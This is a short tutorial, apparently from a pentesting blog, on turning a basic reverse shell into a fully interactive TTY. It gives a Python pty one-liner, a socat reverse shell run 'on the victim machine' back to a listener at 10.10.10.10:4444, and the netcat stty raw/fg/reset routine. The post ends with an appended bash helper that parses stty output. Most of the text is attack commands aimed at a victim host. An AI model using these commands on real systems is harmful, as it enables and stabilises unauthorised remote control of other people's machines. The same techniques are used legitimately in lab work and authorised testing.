Author: lomar
# Method 1: Python pty module

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

or

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

# Method 2: Using socat
On your own machine:

```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

On the victim machine:

```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444
```

If socat is not installed on the victim machine, you can download it and upload it to the victim machine from this GitHub repository.
# Method 3: Upgrading from netcat with magic

## Background the reverse shell

First, you have to background your shell. To do this, press CTRL+Z.
## TERM

Second, get your TERM type. For this you can use the command:

```
echo $TERM
```

```
xterm-256color
```

Now you have got your TERM type.
## STTY

Third, you have to get the settings of your stty. To do this, run:

```
stty -a
```

```
speed 38400 baud; rows 52; columns 236; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
```

## Summary

TERM is xterm-256color. Rows 52 and columns 236.
## Get back

To get back to the reverse shell, run the following commands in order:

```
stty raw -echo
```

and

```
fg
```

When the reverse shell listener command is re-executed (e.g. `nc -nvlp 4444`), run:

```
reset
```

After the reset command the shell looks normal again. Lastly, you have to run these commands in order (the TERM value must match what `echo $TERM` printed above):

```
export SHELL=bash
export TERM=xterm-256color
stty rows 52 columns 236
```

# Conclusion
Now your reverse shell is as interactive as an SSH shell!
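As an added example (not from the original post), a small shell helper that parses captured `stty -a` output together with the TERM value from your own terminal and prints the three fix-up commands from Method 3, so the rows and columns never have to be retyped by hand. The function names `stty_dims` and `fixup_cmds` and the sample text are this example's own; the sample values are the ones shown in the post.

```shell
#!/usr/bin/env bash
# Added example: derive the TTY fix-up commands of Method 3 from captured
# `stty -a` output and a TERM value. Not part of the original post.

# Print "ROWS COLS" taken from the first line of `stty -a` output ($1).
# Prints nothing if the line does not carry rows/columns.
stty_dims() {
  printf '%s\n' "$1" | sed -n '1s/.*rows \([0-9]*\); columns \([0-9]*\);.*/\1 \2/p'
}

# Print the commands to run inside the upgraded shell.
# $1 = TERM value from your own terminal, $2 = `stty -a` output.
fixup_cmds() {
  dims=$(stty_dims "$2")
  [ -n "$dims" ] || { echo "could not parse rows/columns from stty output" >&2; return 1; }
  rows=${dims% *}
  cols=${dims#* }
  printf 'export SHELL=bash\nexport TERM=%s\nstty rows %s columns %s\n' "$1" "$rows" "$cols"
}

# Constructed sample input, matching the values shown in the post.
SAMPLE_STTY='speed 38400 baud; rows 52; columns 236; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;'
SAMPLE_TERM='xterm-256color'

fixup_cmds "$SAMPLE_TERM" "$SAMPLE_STTY"
```

Feed it the real output of `echo $TERM` and `stty -a` from your own terminal and paste the printed lines into the reverse shell after `reset`.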